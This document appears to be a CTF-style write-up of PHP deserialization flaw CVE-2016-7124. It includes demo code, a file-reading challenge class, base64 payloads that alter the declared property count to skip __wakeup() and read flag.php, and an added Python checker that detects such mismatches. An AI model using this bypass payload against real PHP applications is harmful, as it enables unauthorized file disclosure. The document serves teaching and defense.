
PHP Deserialization Vulnerability: CVE-2016-7124

Vulnerability overview

When the value in a serialized string that declares the number of object properties is larger than the number of properties actually present, unserialize() skips the call to __wakeup(), while __destruct() still runs when the object is released.

Demo code:

<?php
highlight_file(__FILE__);
class test {
    var $bull;
    public function __destruct() {
        $this->bull = "destruct<br/>";
        echo $this->bull;
        echo "destruct ok!<br/>";
    }
    public function __wakeup() {
        $this->bull = "wake up<br/>";
        echo $this->bull;
        echo "wake up ok!<br/>";
    }
}
// Normal payload
// $payload = 'O:4:"test":1:{s:4:"bull";s:4:"sdfz";}';
// Payload that triggers the vulnerability (declares 2 properties, only 1 present)
$payload = 'O:4:"test":2:{s:4:"bull";s:4:"sdfz";}';
$abc = unserialize($payload);
?>

Challenge

<?php
class SoFun {
    protected $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        if (!empty($this->file)) {
            // Inspect the file name: if it contains '\\' or '/', report an error
            if (strchr($this->file, "\\") === false && strchr($this->file, '/') === false) {
                show_source(dirname(__FILE__) . '/' . $this->file);
            } else {
                die('Wrong filename.');
            }
        }
    }
    function __wakeup() {
        $this->file = 'index.php';
    }
    public function __toString() {
        return '';
    }
}
if (!isset($_GET['file'])) {
    show_source('index.php');
} else {
    $file = base64_decode($_GET['file']);
    echo unserialize($file);
}
?>

Solution:

1. Obtain the serialized object

<?php
class SoFun {
    protected $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        if (!empty($this->file)) {
            // Inspect the file name: if it contains '\\' or '/', report an error
            if (strchr($this->file, "\\") === false && strchr($this->file, '/') === false) {
                show_source(dirname(__FILE__) . '/' . $this->file);
            } else {
                die('Wrong filename.');
            }
        }
    }
    function __wakeup() {
        $this->file = 'index.php';
    }
    public function __toString() {
        return '';
    }
}
if (!isset($_GET['file'])) {
    //show_source('index.php');
} else {
    $file = base64_decode($_GET['file']);
    echo unserialize($file);
}
$test = new SoFun('flag.php');
// The protected property serializes as "\0*\0file" (7 bytes), hence the s:7 in the result
echo base64_encode(serialize($test));
?>

Result:
Tzo1OiJTb0Z1biI6MTp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9

2. Exploit the vulnerability

# Change the property count to a value larger than the actual number of properties and base64-encode again
Tzo1OiJTb0Z1biI6Mjp7czo3OiIAKgBmaWxlIjtzOjg6ImZsYWcucGhwIjt9  
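As an added example (not part of the original write-up), the following Python check parses a decoded PHP serialize() payload and reports every object whose declared property count differs from the members actually present, which is exactly the condition under which the vulnerable unserialize() skips __wakeup(); a defender can run it over the base64-decoded `file` parameter before it reaches unserialize(). It handles only the tags N, i, b, d, s, a and O (references and C: are rejected with an error), and the two constants are the write-up's payloads base64-decoded.

```python
def find_mismatches(data: bytes) -> list:
    """Return [(class, declared, actual), ...] for each serialized object whose declared
    property count differs from the members present (tags N, i, b, d, s, a, O handled)."""
    pos, found = 0, []
    def expect(tok: bytes):                      # consume a literal token or fail
        nonlocal pos
        if not data.startswith(tok, pos): raise ValueError(f"expected {tok!r} at {pos}")
        pos += len(tok)
    def until(delim: bytes) -> bytes:            # read up to delim and consume it
        nonlocal pos
        end = data.index(delim, pos)             # ValueError if delim is missing
        val, pos = data[pos:end], end + 1
        return val
    def string() -> bytes:                       # <len>:"<bytes>"; byte length, so "\0*\0file" is 7
        nonlocal pos
        length = int(until(b":"))
        expect(b'"')
        val, pos = data[pos:pos + length], pos + length
        expect(b'"')
        return val
    def members() -> list:                       # {key;value;...}
        expect(b"{")
        out = []
        while not data.startswith(b"}", pos):
            out.append((value(), value()))       # key first, then value
        expect(b"}")
        return out
    def value():
        tag = data[pos:pos + 1]
        expect(tag + (b";" if tag == b"N" else b":"))
        if tag == b"N": return None
        if tag in (b"i", b"b", b"d"): return until(b";")
        if tag == b"s":
            val = string(); expect(b";"); return val
        if tag == b"a":
            until(b":"); return members()        # element count is not checked here
        if tag == b"O":
            cls = string(); expect(b":")
            declared, props = int(until(b":")), members()
            if declared != len(props):           # exactly when vulnerable unserialize() skips __wakeup
                found.append((cls.decode(), declared, len(props)))
            return (cls, props)
        raise ValueError(f"unsupported tag {tag!r} at offset {pos - 2}")
    value()
    if pos != len(data): raise ValueError("trailing data after serialized value")
    return found

# The write-up's two payloads, base64-decoded; \x00*\x00 marks the protected property.
BENIGN = b'O:5:"SoFun":1:{s:7:"\x00*\x00file";s:8:"flag.php";}'
BYPASS = b'O:5:"SoFun":2:{s:7:"\x00*\x00file";s:8:"flag.php";}'
```

Rejecting input on a mismatch is safe because well-formed serialize() output never produces one.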

3. Visit the URL

Source: 智云一二三科技


Article URL: https://www.zhihuclub.com/153615.shtml

Author: 智云科技
